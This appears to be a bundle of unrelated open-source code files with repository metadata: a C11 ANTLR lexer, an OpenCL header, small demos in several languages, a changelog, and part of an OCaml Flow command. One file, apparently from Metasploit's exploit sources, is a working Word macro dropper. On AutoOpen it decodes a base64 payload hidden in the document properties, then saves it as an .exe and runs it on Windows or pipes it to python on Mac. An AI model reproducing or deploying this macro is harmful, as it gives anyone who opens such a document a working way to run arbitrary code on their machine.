derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/* Partially extracted from the original C.g4.
- added recognition of $ as a NonDigit in Identifier
- better line continuation handling
- fixed bugs in pre-processor directives
Copyright (c) 2020 International Business Machines Corporation
Prepared by: Geert Janssen <geert@us.ibm.com>
*/
/** C 2011 grammar built from the C11 Spec */
lexer grammar C11_lexer_common; // always imported; name does not really matter
// (GCC) Extension keywords:
Extension__ : '__extension__';
Builtin_va_arg: '__builtin_va_arg';
Builtin_offsetof: '__builtin_offsetof';
M128: '__m128';
M128d: '__m128d';
M128i: '__m128i';
Typeof__: '__typeof__';
Inline__: '__inline__';
Stdcall: '__stdcall';
Declspec: '__declspec';
Attribute__: '__attribute__';
Asm: '__asm';
Asm__: '__asm__';
Volatile__: '__volatile__';
//A.1.2 Keywords
AUTO: 'auto';
BREAK: 'break';
CASE: 'case';
CHAR: 'char';
CONST: 'const';
CONTINUE: 'continue';
DEFAULT: 'default';
DO: 'do';
DOUBLE: 'double';
ELSE: 'else';
ENUM: 'enum';
EXTERN: 'extern';
FLOAT: 'float';
FOR: 'for';
GOTO: 'goto';
IF: 'if';
INLINE: 'inline';
INT: 'int';
LONG: 'long';
REGISTER: 'register';
RESTRICT: 'restrict';
RETURN: 'return';
SHORT: 'short';
SIGNED: 'signed';
SIZEOF: 'sizeof';
STATIC: 'static';
STRUCT: 'struct';
SWITCH: 'switch';
TYPEDEF: 'typedef';
UNION: 'union';
UNSIGNED: 'unsigned';
VOID: 'void';
VOLATILE: 'volatile';
WHILE: 'while';
ALIGNAS: '_Alignas';
ALIGNOF: '_Alignof';
ATOMIC: '_Atomic';
BOOL: '_Bool';
COMPLEX: '_Complex';
GENERIC: '_Generic';
IMAGINARY: '_Imaginary';
NORETURN: '_Noreturn';
STATIC_ASSERT: '_Static_assert';
THREAD_LOCAL: '_Thread_local';
//A.1.3 Identifiers
Identifier
: IdentifierNondigit
( IdentifierNondigit
| Digit
)*
;
fragment
IdentifierNondigit
: Nondigit
| UniversalCharacterName
//| // other implementation-defined characters...
;
// GJ20: extend to allow $
fragment
Nondigit
: [a-zA-Z_$]
;
fragment
Digit
: [0-9]
;
fragment
UniversalCharacterName
: '\\u' HexQuad
| '\\U' HexQuad HexQuad
;
fragment
HexQuad
: HexadecimalDigit HexadecimalDigit HexadecimalDigit HexadecimalDigit
;
//A.1.5 Constants
// rule for Constant moved to parser; constituents unfragmented.
/*
Constant
: IntegerConstant
| FloatingConstant
//| EnumerationConstant
| CharacterConstant
;
*/
IntegerConstant
: DecimalConstant IntegerSuffix?
| OctalConstant IntegerSuffix?
| HexadecimalConstant IntegerSuffix?
| BinaryConstant
;
fragment
BinaryConstant
: '0' [bB] [0-1]+
;
fragment
DecimalConstant
: NonzeroDigit Digit*
;
fragment
OctalConstant
: '0' OctalDigit*
;
fragment
HexadecimalConstant
: HexadecimalPrefix HexadecimalDigit+
;
fragment
HexadecimalPrefix
: '0' [xX]
;
fragment
NonzeroDigit
: [1-9]
;
fragment
OctalDigit
: [0-7]
;
fragment
HexadecimalDigit
: [0-9a-fA-F]
;
fragment
IntegerSuffix
: UnsignedSuffix LongSuffix?
| UnsignedSuffix LongLongSuffix
| LongSuffix UnsignedSuffix?
| LongLongSuffix UnsignedSuffix?
;
fragment
UnsignedSuffix
: [uU]
;
fragment
LongSuffix
: [lL]
;
fragment
LongLongSuffix
: 'll' | 'LL'
;
FloatingConstant
: DecimalFloatingConstant
| HexadecimalFloatingConstant
;
fragment
DecimalFloatingConstant
: FractionalConstant ExponentPart? FloatingSuffix?
| DigitSequence ExponentPart FloatingSuffix?
;
fragment
HexadecimalFloatingConstant
: HexadecimalPrefix HexadecimalFractionalConstant BinaryExponentPart FloatingSuffix?
| HexadecimalPrefix HexadecimalDigitSequence BinaryExponentPart FloatingSuffix?
;
fragment
FractionalConstant
: DigitSequence? '.' DigitSequence
| DigitSequence '.'
;
fragment
ExponentPart
: 'e' Sign? DigitSequence
| 'E' Sign? DigitSequence
;
fragment
Sign
: '+' | '-'
;
DigitSequence
: Digit+
;
fragment
HexadecimalFractionalConstant
: HexadecimalDigitSequence? '.' HexadecimalDigitSequence
| HexadecimalDigitSequence '.'
;
fragment
BinaryExponentPart
: 'p' Sign? DigitSequence
| 'P' Sign? DigitSequence
;
fragment
HexadecimalDigitSequence
: HexadecimalDigit+
;
fragment
FloatingSuffix
: 'f' | 'l' | 'F' | 'L'
;
CharacterConstant
: '\'' CCharSequence '\''
| 'L\'' CCharSequence '\''
| 'u\'' CCharSequence '\''
| 'U\'' CCharSequence '\''
;
fragment
CCharSequence
: CChar+
;
fragment
CChar
: ~['\\\r\n] // GJ20: approximation
| EscapeSequence
;
fragment
EscapeSequence
: SimpleEscapeSequence
| OctalEscapeSequence
| HexadecimalEscapeSequence
| UniversalCharacterName
;
// GJ20: allow any character to be escaped
fragment
SimpleEscapeSequence
// : '\\' ['"?abfnrtv\\]
: '\\' .
;
fragment
OctalEscapeSequence
: '\\' OctalDigit
| '\\' OctalDigit OctalDigit
| '\\' OctalDigit OctalDigit OctalDigit
;
fragment
HexadecimalEscapeSequence
: '\\x' HexadecimalDigit+
;
//A.1.6
StringLiteral
: EncodingPrefix? '"' SCharSequence? '"'
;
fragment
EncodingPrefix
: 'u8'
| 'u'
| 'U'
| 'L'
;
fragment
SCharSequence
: SChar+
;
// GJ20: Handling of \ Newline is incorrect, but works somewhat.
fragment
SChar
: ~["\\\r\n] // GJ20: approximation
| EscapeSequence
| EscapeNewline
;
//A.1.7 Punctuators
// Operator and punctuation:
// Enclosing brackets:
LeftParen: '(';
RightParen: ')';
LeftBracket: '[';
RightBracket: ']';
LeftBrace: '{';
RightBrace: '}';
// Preprocessor-related symbols:
HashMark: '#';
HashMarkHashMark: '##';
// Alternatives:
LessColon: '<:'; // alt [
ColonGreater: ':>'; // alt ]
LessPercent: '<%'; // alt {
PrecentGreater: '%>'; // alt }
PrecentColon: '%:'; // alt #
PercentColonPercentColon: '%:%:'; // alt ##
// Punctuators:
Semi: ';';
Colon: ':';
Ellipsis: '...';
Comma: ',';
Dot: '.';
// Operators:
Question: '?';
Plus: '+';
Minus: '-';
Star: '*';
Div: '/';
Mod: '%';
Caret: '^';
And: '&';
Or: '|';
Tilde: '~';
Not: '!';
Assign: '=';
Less: '<';
Greater: '>';
PlusAssign: '+=';
MinusAssign: '-=';
StarAssign: '*=';
DivAssign: '/=';
ModAssign: '%=';
XorAssign: '^=';
AndAssign: '&=';
OrAssign: '|=';
LeftShift: '<<';
RightShift: '>>';
RightShiftAssign: '>>=';
LeftShiftAssign: '<<=';
Equal: '==';
NotEqual: '!=';
LessEqual: '<=';
GreaterEqual: '>=';
AndAnd: '&&';
OrOr: '||';
PlusPlus: '++';
MinusMinus: '--';
Arrow: '->';
// GJ20: completely bogus; will skip everything till next #
/*
ComplexDefine
: '#' Whitespace? 'define' ~[#]*
-> skip
;
*/
// GJ20: covered by Directive; see below.
/*
IncludeDirective
: '#' Whitespace? 'include' Whitespace? (('"' ~[\n"]+ '"') | ('<' ~[\n>]+ '>' ))
-> skip
;
*/
// ignore the following asm blocks:
/*
asm
{
mfspr x, 286;
}
*/
AsmBlock
: 'asm' ~'{'* '{' ~'}'* '}'
-> skip
;
// GJ20: covered by Directive; see below.
// ignore the lines generated by c preprocessor
// sample line: '#line 1 "/home/dm/files/dk1.h" 1'
/*
LineAfterPreprocessing
: '#line' Whitespace* ~[\r\n]*
-> skip
;
*/
// GJ20: covered by Directive; see below.
/*
LineDirective
: '#' Whitespace? DecimalConstant Whitespace? StringLiteral ~[\r\n]*
-> skip
;
*/
// GJ20: covered by Directive; see below.
/*
PragmaDirective
: '#' Whitespace? 'pragma' Whitespace ~[\r\n]*
-> skip
;
*/
// GJ20: every preprocessor directive is treated a line comment.
Directive:
'#' (~[\\\r\n]* EscapeNewline)* ~[\r\n]* -> channel(HIDDEN);
// GJ20: added vertical tab \v (^K) and formfeed \f (^L)
Whitespace
: [ \t\u000B\f]+
-> skip
;
Newline
: ( '\r' '\n'?
| '\n'
)
-> skip
;
// GJ20: this will create logical lines.
EscapeNewline
: '\\' Newline
-> skip
;
// GJ20: anticipate \ Newline
BlockComment
: '/*' .*? '*/'
-> channel(HIDDEN)
;
// GJ20: anticipate \ Newline
LineComment
: '//' (~[\\\r\n]* EscapeNewline)* ~[\r\n]*
-> channel(HIDDEN)
;
| ANTLR | 4 | yingkitw/Project_CodeNet | tools/spt-generator/src/com/ibm/ai4code/parser/c_multi/C11_lexer_common.g4 | [
"Apache-2.0"
] |
/* Copyright (c) 2009-2017 Qualcomm Technologies, Inc. All Rights Reserved.
* Qualcomm Technologies Proprietary and Confidential.
*/
#ifndef __OPENCL_CL_EXT_QCOM_H
#define __OPENCL_CL_EXT_QCOM_H
// Needed by cl_khr_egl_event extension
#include <EGL/egl.h>
#include <EGL/eglext.h>
#include <CL/cl_ext.h>
#ifdef __cplusplus
extern "C" {
#endif
/************************************
* cl_qcom_create_buffer_from_image *
************************************/
#define CL_BUFFER_FROM_IMAGE_ROW_PITCH_QCOM 0x40C0
#define CL_BUFFER_FROM_IMAGE_SLICE_PITCH_QCOM 0x40C1
extern CL_API_ENTRY cl_mem CL_API_CALL
clCreateBufferFromImageQCOM(cl_mem image,
cl_mem_flags flags,
cl_int *errcode_ret);
/************************************
* cl_qcom_limited_printf extension *
************************************/
/* Builtin printf function buffer size in bytes. */
#define CL_DEVICE_PRINTF_BUFFER_SIZE_QCOM 0x1049
/*************************************
* cl_qcom_extended_images extension *
*************************************/
#define CL_CONTEXT_ENABLE_EXTENDED_IMAGES_QCOM 0x40AA
#define CL_DEVICE_EXTENDED_IMAGE2D_MAX_WIDTH_QCOM 0x40AB
#define CL_DEVICE_EXTENDED_IMAGE2D_MAX_HEIGHT_QCOM 0x40AC
#define CL_DEVICE_EXTENDED_IMAGE3D_MAX_WIDTH_QCOM 0x40AD
#define CL_DEVICE_EXTENDED_IMAGE3D_MAX_HEIGHT_QCOM 0x40AE
#define CL_DEVICE_EXTENDED_IMAGE3D_MAX_DEPTH_QCOM 0x40AF
/*************************************
* cl_qcom_perf_hint extension *
*************************************/
typedef cl_uint cl_perf_hint;
#define CL_CONTEXT_PERF_HINT_QCOM 0x40C2
/*cl_perf_hint*/
#define CL_PERF_HINT_HIGH_QCOM 0x40C3
#define CL_PERF_HINT_NORMAL_QCOM 0x40C4
#define CL_PERF_HINT_LOW_QCOM 0x40C5
extern CL_API_ENTRY cl_int CL_API_CALL
clSetPerfHintQCOM(cl_context context,
cl_perf_hint perf_hint);
// This extension is published at Khronos, so its definitions are made in cl_ext.h.
// This duplication is for backward compatibility.
#ifndef CL_MEM_ANDROID_NATIVE_BUFFER_HOST_PTR_QCOM
/*********************************
* cl_qcom_android_native_buffer_host_ptr extension
*********************************/
#define CL_MEM_ANDROID_NATIVE_BUFFER_HOST_PTR_QCOM 0x40C6
typedef struct _cl_mem_android_native_buffer_host_ptr
{
// Type of external memory allocation.
// Must be CL_MEM_ANDROID_NATIVE_BUFFER_HOST_PTR_QCOM for Android native buffers.
cl_mem_ext_host_ptr ext_host_ptr;
// Virtual pointer to the android native buffer
void* anb_ptr;
} cl_mem_android_native_buffer_host_ptr;
#endif //#ifndef CL_MEM_ANDROID_NATIVE_BUFFER_HOST_PTR_QCOM
/***********************************
* cl_img_egl_image extension *
************************************/
typedef void* CLeglImageIMG;
typedef void* CLeglDisplayIMG;
extern CL_API_ENTRY cl_mem CL_API_CALL
clCreateFromEGLImageIMG(cl_context context,
cl_mem_flags flags,
CLeglImageIMG image,
CLeglDisplayIMG display,
cl_int *errcode_ret);
/*********************************
* cl_qcom_other_image extension
*********************************/
// Extended flag for creating/querying QCOM non-standard images
#define CL_MEM_OTHER_IMAGE_QCOM (1<<25)
// cl_channel_type
#define CL_QCOM_UNORM_MIPI10 0x4159
#define CL_QCOM_UNORM_MIPI12 0x415A
#define CL_QCOM_UNSIGNED_MIPI10 0x415B
#define CL_QCOM_UNSIGNED_MIPI12 0x415C
#define CL_QCOM_UNORM_INT10 0x415D
#define CL_QCOM_UNORM_INT12 0x415E
#define CL_QCOM_UNSIGNED_INT16 0x415F
// cl_channel_order
// Dedicate 0x4130-0x415F range for QCOM extended image formats
// 0x4130 - 0x4132 range is assigned to pixel-oriented compressed format
#define CL_QCOM_BAYER 0x414E
#define CL_QCOM_NV12 0x4133
#define CL_QCOM_NV12_Y 0x4134
#define CL_QCOM_NV12_UV 0x4135
#define CL_QCOM_TILED_NV12 0x4136
#define CL_QCOM_TILED_NV12_Y 0x4137
#define CL_QCOM_TILED_NV12_UV 0x4138
#define CL_QCOM_P010 0x413C
#define CL_QCOM_P010_Y 0x413D
#define CL_QCOM_P010_UV 0x413E
#define CL_QCOM_TILED_P010 0x413F
#define CL_QCOM_TILED_P010_Y 0x4140
#define CL_QCOM_TILED_P010_UV 0x4141
#define CL_QCOM_TP10 0x4145
#define CL_QCOM_TP10_Y 0x4146
#define CL_QCOM_TP10_UV 0x4147
#define CL_QCOM_TILED_TP10 0x4148
#define CL_QCOM_TILED_TP10_Y 0x4149
#define CL_QCOM_TILED_TP10_UV 0x414A
/*********************************
* cl_qcom_compressed_image extension
*********************************/
// Extended flag for creating/querying QCOM non-planar compressed images
#define CL_MEM_COMPRESSED_IMAGE_QCOM (1<<27)
// Extended image format
// cl_channel_order
#define CL_QCOM_COMPRESSED_RGBA 0x4130
#define CL_QCOM_COMPRESSED_RGBx 0x4131
#define CL_QCOM_COMPRESSED_NV12_Y 0x413A
#define CL_QCOM_COMPRESSED_NV12_UV 0x413B
#define CL_QCOM_COMPRESSED_P010 0x4142
#define CL_QCOM_COMPRESSED_P010_Y 0x4143
#define CL_QCOM_COMPRESSED_P010_UV 0x4144
#define CL_QCOM_COMPRESSED_TP10 0x414B
#define CL_QCOM_COMPRESSED_TP10_Y 0x414C
#define CL_QCOM_COMPRESSED_TP10_UV 0x414D
#define CL_QCOM_COMPRESSED_NV12_4R 0x414F
#define CL_QCOM_COMPRESSED_NV12_4R_Y 0x4150
#define CL_QCOM_COMPRESSED_NV12_4R_UV 0x4151
/*********************************
* cl_qcom_compressed_yuv_image_read extension
*********************************/
// Extended flag for creating/querying QCOM compressed images
#define CL_MEM_COMPRESSED_YUV_IMAGE_QCOM (1<<28)
// Extended image format
#define CL_QCOM_COMPRESSED_NV12 0x10C4
// Extended flag for setting ION buffer allocation type
#define CL_MEM_ION_HOST_PTR_COMPRESSED_YUV_QCOM 0x40CD
#define CL_MEM_ION_HOST_PTR_PROTECTED_COMPRESSED_YUV_QCOM 0x40CE
/*********************************
* cl_qcom_accelerated_image_ops
*********************************/
#define CL_MEM_OBJECT_WEIGHT_IMAGE_QCOM 0x4110
#define CL_DEVICE_HOF_MAX_NUM_PHASES_QCOM 0x4111
#define CL_DEVICE_HOF_MAX_FILTER_SIZE_X_QCOM 0x4112
#define CL_DEVICE_HOF_MAX_FILTER_SIZE_Y_QCOM 0x4113
#define CL_DEVICE_BLOCK_MATCHING_MAX_REGION_SIZE_X_QCOM 0x4114
#define CL_DEVICE_BLOCK_MATCHING_MAX_REGION_SIZE_Y_QCOM 0x4115
//Extended flag for specifying weight image type
#define CL_WEIGHT_IMAGE_SEPARABLE_QCOM (1<<0)
// Box Filter
typedef struct _cl_box_filter_size_qcom
{
// Width of box filter on X direction.
float box_filter_width;
// Height of box filter on Y direction.
float box_filter_height;
} cl_box_filter_size_qcom;
// HOF Weight Image Desc
typedef struct _cl_weight_desc_qcom
{
/** Coordinate of the "center" point of the weight image,
based on the weight image's top-left corner as the origin. */
size_t center_coord_x;
size_t center_coord_y;
cl_bitfield flags;
} cl_weight_desc_qcom;
typedef struct _cl_weight_image_desc_qcom
{
cl_image_desc image_desc;
cl_weight_desc_qcom weight_desc;
} cl_weight_image_desc_qcom;
/*************************************
* cl_qcom_protected_context extension *
*************************************/
#define CL_CONTEXT_PROTECTED_QCOM 0x40C7
#define CL_MEM_ION_HOST_PTR_PROTECTED_QCOM 0x40C8
/*************************************
* cl_qcom_priority_hint extension *
*************************************/
#define CL_PRIORITY_HINT_NONE_QCOM 0
typedef cl_uint cl_priority_hint;
#define CL_CONTEXT_PRIORITY_HINT_QCOM 0x40C9
/*cl_priority_hint*/
#define CL_PRIORITY_HINT_HIGH_QCOM 0x40CA
#define CL_PRIORITY_HINT_NORMAL_QCOM 0x40CB
#define CL_PRIORITY_HINT_LOW_QCOM 0x40CC
#ifdef __cplusplus
}
#endif
#endif /* __OPENCL_CL_EXT_QCOM_H */
| C | 2 | wolterhv/openpilot | phonelibs/opencl/include/CL/cl_ext_qcom.h | [
"MIT"
] |
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
Sub AutoOpen()
On Error Resume Next
Dim found_value As String
For Each prop In ActiveDocument.BuiltInDocumentProperties
If prop.Name = "Comments" Then
found_value = Mid(prop.Value, 56)
orig_val = Base64Decode(found_value)
#If Mac Then
ExecuteForOSX (orig_val)
#Else
ExecuteForWindows (orig_val)
#End If
Exit For
End If
Next
End Sub
Sub ExecuteForWindows(code)
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
tmp_folder = fso.GetSpecialFolder(2)
tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
Set f = fso.createTextFile(tmp_name)
f.Write (code)
f.Close
CreateObject("WScript.Shell").Run (tmp_name)
End Sub
Sub ExecuteForOSX(code)
system ("echo """ & code & """ | python &")
End Sub
' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
'rfc1521
'1999 Antonin Foller, Motobit Software, http://Motobit.cz
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
Base64Decode = sOut
End Function
| Visual Basic | 4 | OsmanDere/metasploit-framework | external/source/exploits/office_word_macro/macro.vba | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
extends Node
# Main scene.
# Create the two peers.
var p1 = WebRTCPeerConnection.new()
var p2 = WebRTCPeerConnection.new()
var ch1 = p1.create_data_channel("chat", {"id": 1, "negotiated": true})
var ch2 = p2.create_data_channel("chat", {"id": 1, "negotiated": true})
func _ready():
print(p1.create_data_channel("chat", {"id": 1, "negotiated": true}))
# Connect P1 session created to itself to set local description.
p1.connect("session_description_created", p1, "set_local_description")
# Connect P1 session and ICE created to p2 set remote description and candidates.
p1.connect("session_description_created", p2, "set_remote_description")
p1.connect("ice_candidate_created", p2, "add_ice_candidate")
# Same for P2.
p2.connect("session_description_created", p2, "set_local_description")
p2.connect("session_description_created", p1, "set_remote_description")
p2.connect("ice_candidate_created", p1, "add_ice_candidate")
# Let P1 create the offer.
p1.create_offer()
# Wait a second and send message from P1.
yield(get_tree().create_timer(1), "timeout")
ch1.put_packet("Hi from P1".to_utf8())
# Wait a second and send message from P2.
yield(get_tree().create_timer(1), "timeout")
ch2.put_packet("Hi from P2".to_utf8())
func _process(delta):
p1.poll()
p2.poll()
if ch1.get_ready_state() == ch1.STATE_OPEN and ch1.get_available_packet_count() > 0:
print("P1 received: ", ch1.get_packet().get_string_from_utf8())
if ch2.get_ready_state() == ch2.STATE_OPEN and ch2.get_available_packet_count() > 0:
print("P2 received: ", ch2.get_packet().get_string_from_utf8())
| GDScript | 4 | jonbonazza/godot-demo-projects | networking/webrtc_minimal/minimal.gd | [
"MIT"
] |
var x = 1;
var x = 2;
function f() {
var y = 1;
var y = 2;
}
function f2() {
var z = 3;
var z = "";
} | TypeScript | 2 | nilamjadhav/TypeScript | tests/cases/compiler/duplicateLocalVariable3.ts | [
"Apache-2.0"
] |
// @flow
// Pulled from react-compat
// https://github.com/developit/preact-compat/blob/7c5de00e7c85e2ffd011bf3af02899b63f699d3a/src/index.js#L349
export default function shallowDiffers(prev: Object, next: Object): boolean {
for (let attribute in prev) {
if (!(attribute in next)) {
return true;
}
}
for (let attribute in next) {
if (prev[attribute] !== next[attribute]) {
return true;
}
}
return false;
}
| JavaScript | 3 | vegYY/react | packages/react-devtools-shared/src/node_modules/react-window/src/shallowDiffers.js | [
"MIT"
] |
<#ftl output_format="plainText">
${msg("emailTestBody", realmName)} | FreeMarker | 2 | rmartinc/keycloak | themes/src/main/resources/theme/base/email/text/email-test.ftl | [
"Apache-2.0"
] |
plz foo with {'Content-Type':'text/plain','Accept':'en-US'}
| Dogescript | 0 | erinkeith/dogescript | test/spec/plz/with-json-multi-props/source.djs | [
"MIT"
] |
<nav class="main-header navbar navbar-expand navbar-white navbar-light">
<ul class="navbar-nav">
<li class="nav-item">
<a class="nav-link" data-widget="pushmenu" href="#"><i class="fas fa-bars"></i></a>
</li>
<li class="nav-item d-none d-sm-inline-block">
<a href="https://github.com/phalcon/phalcon-devtools/issues" class="nav-link text-primary" target="_blank">
<i class="fas fa-exclamation-triangle"></i>
Did something go wrong? Try the Github Issues.
</a>
</li>
</ul>
</nav>
| Volt | 3 | PSD-Company/phalcon-devtools-docker | src/Web/Tools/Views/partials/header.volt | [
"BSD-3-Clause"
] |
.. bpo: 28147
.. date: 9795
.. nonce: CnK_xf
.. release date: 2016-12-16
.. section: Core and Builtins
Fix a memory leak in split-table dictionaries: setattr() must not convert
combined table into split table. Patch written by INADA Naoki.
..
.. bpo: 28990
.. date: 9794
.. nonce: m8xRMJ
.. section: Core and Builtins
Fix asyncio SSL hanging if connection is closed before handshake is
completed. (Patch by HoHo-Ho)
..
.. bpo: 28770
.. date: 9793
.. nonce: N9GQsz
.. section: Tools/Demos
Fix python-gdb.py for fastcalls.
..
.. bpo: 28896
.. date: 9792
.. nonce: ymAbmH
.. section: Windows
Deprecate WindowsRegistryFinder.
..
.. bpo: 28898
.. date: 9791
.. nonce: YGUd_i
.. section: Build
Prevent gdb build errors due to HAVE_LONG_LONG redefinition.
| reStructuredText | 0 | shawwn/cpython | Misc/NEWS.d/3.6.0rc2.rst | [
"0BSD"
] |
/-
Copyright (c) 2016 Microsoft Corporation. All rights reserved.
Released under Apache 2.0 license as described in the file LICENSE.
Authors: Sebastian Ullrich
-/
prelude
import init.meta.tactic init.meta.rb_map init.meta.has_reflect init.meta.lean.parser
meta constant attribute.get_instances : name → tactic (list name)
meta constant attribute.fingerprint : name → tactic nat
meta structure user_attribute_cache_cfg (cache_ty : Type) :=
(mk_cache : list name → tactic cache_ty)
(dependencies : list name)
meta def user_attribute.dflt_cache_cfg : tactic unit :=
tactic.exact `(⟨λ _, pure (), []⟩ : user_attribute_cache_cfg unit)
meta def user_attribute.dflt_parser : tactic unit :=
tactic.exact `(pure () : lean.parser unit)
meta structure user_attribute (cache_ty : Type := unit) (param_ty : Type := unit) :=
(name : name)
(descr : string)
/- Optional handler that will be called after the attribute has been applied to a declaration.
Failing the tactic will fail the entire `attribute/def/...` command, i.e. the attribute will
not be applied after all.
Declaring an `after_set` handler without a `before_unset` handler will make the attribute
non-removable. -/
(after_set : option (Π (decl : _root_.name) (prio : nat) (persistent : bool), command) := none)
/- Optional handler that will be called before the attribute is removed from a declaration. -/
(before_unset : option (Π (decl : _root_.name) (persistent : bool), command) := none)
(cache_cfg : user_attribute_cache_cfg cache_ty . user_attribute.dflt_cache_cfg)
[reflect_param : has_reflect param_ty]
/- Parser that will be invoked after parsing the attribute's name. The parse result will be reflected
and stored and can be retrieved with `user_attribute.get_param`. -/
(parser : lean.parser param_ty . user_attribute.dflt_parser)
/- Registers a new user-defined attribute. The argument must be the name of a definition of type
`user_attribute`. -/
meta def attribute.register (decl : name) : command :=
tactic.set_basic_attribute ``user_attribute decl tt
meta constant user_attribute.get_cache {α β : Type} (attr : user_attribute α β) : tactic α
meta def user_attribute.parse_reflect {α β : Type} (attr : user_attribute α β) : lean.parser expr :=
(λ a, attr.reflect_param a) <$> attr.parser
meta constant user_attribute.get_param_untyped {α β : Type} (attr : user_attribute α β) (decl : name)
: tactic expr
meta constant user_attribute.set_untyped {α β : Type} [reflected β] (attr : user_attribute α β) (decl : name)
(val : expr) (persistent : bool) (prio : option nat := none) : tactic unit
meta def user_attribute.get_param {α β : Type} [reflected β] (attr : user_attribute α β) (n : name) : tactic β :=
attr.get_param_untyped n >>= tactic.eval_expr β
meta def user_attribute.set {α β : Type} [reflected β] (attr : user_attribute α β) (n : name)
(val : β) (persistent : bool) (prio : option nat := none) : tactic unit :=
attr.set_untyped n (attr.reflect_param val) persistent prio
open tactic
meta def register_attribute := attribute.register
meta def get_attribute_cache_dyn {α : Type} [reflected α] (attr_decl_name : name) : tactic α :=
let attr : pexpr := expr.const attr_decl_name [] in
do e ← to_expr ``(user_attribute.get_cache %%attr),
t ← eval_expr (tactic α) e,
t
meta def mk_name_set_attr (attr_name : name) : command :=
do let t := `(user_attribute name_set),
let v := `({name := attr_name,
descr := "name_set attribute",
cache_cfg := {
mk_cache := λ ns, return (name_set.of_list ns),
dependencies := []}} : user_attribute name_set),
add_meta_definition attr_name [] t v,
register_attribute attr_name
meta def get_name_set_for_attr (name : name) : tactic name_set :=
get_attribute_cache_dyn name
| Lean | 4 | solson/lean | library/init/meta/attribute.lean | [
"Apache-2.0"
] |
_list 10 "filelist.txt" slist
_list slick load
_list slick load +
0 _list sget load +
-4 ampdb *
| SourcePawn | 0 | aleatoricforest/Sporth | examples/slist.sp | [
"MIT"
] |
(*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*)
(***********************************************************************)
(* flow get imports command *)
(***********************************************************************)
open CommandUtils
let spec =
{
CommandSpec.name = "get-imports";
doc = "Get names of all modules imported by one or more given modules";
usage =
Printf.sprintf
"Usage: %s get-requirements [OPTION]... [FILE]...\n\nGet names of all modules imported by one or more given modules\n\nExample usage:\n\t%s get-imports FirstModule SecondModule\n"
CommandUtils.exe_name
CommandUtils.exe_name;
args =
CommandSpec.ArgSpec.(
empty
|> base_flags
|> connect_and_json_flags
|> root_flag
|> strip_root_flag
|> from_flag
|> wait_for_recheck_flag
|> anon "modules" (required (list_of string))
);
}
let main base_flags option_values json pretty root strip_root wait_for_recheck modules () =
let flowconfig_name = base_flags.Base_flags.flowconfig_name in
let root = guess_root flowconfig_name root in
let request = ServerProt.Request.GET_IMPORTS { module_names = modules; wait_for_recheck } in
let (requirements_map, non_flow) =
match connect_and_make_request flowconfig_name option_values root request with
| ServerProt.Response.GET_IMPORTS response -> response
| response -> failwith_bad_response ~request ~response
in
let requirements_map =
SMap.fold
begin
fun module_name reqlocs map ->
let requirements =
Modulename.Map.fold
(fun req loc assoc ->
let req =
match req with
| Modulename.String s -> s
| Modulename.Filename f ->
let f = File_key.to_string f in
if strip_root then
Files.relative_path (Path.to_string root) f
else
f
in
(req, loc) :: assoc)
reqlocs
[]
in
SMap.add module_name requirements map
end
requirements_map
SMap.empty
in
let strip_root =
if strip_root then
Some root
else
None
in
if json || pretty then
Hh_json.(
let json_non_flow =
SSet.fold
(fun module_name acc ->
let json =
JSON_Object [("not_flow", JSON_Bool true); ("requirements", JSON_Array [])]
in
(module_name, json) :: acc)
non_flow
[]
in
let json_imports =
SMap.fold
(fun module_name assoc acc ->
let requirements =
List.fold_left
(fun acc (req, locs) ->
Nel.fold_left
(fun acc loc ->
JSON_Object
(("import", JSON_String req)
::
("loc", json_of_loc_with_offset ~strip_root loc)
:: Errors.deprecated_json_props_of_loc ~strip_root loc
)
:: acc)
acc
locs)
[]
assoc
in
let json =
JSON_Object [("not_flow", JSON_Bool false); ("requirements", JSON_Array requirements)]
in
(module_name, json) :: acc)
requirements_map
[]
in
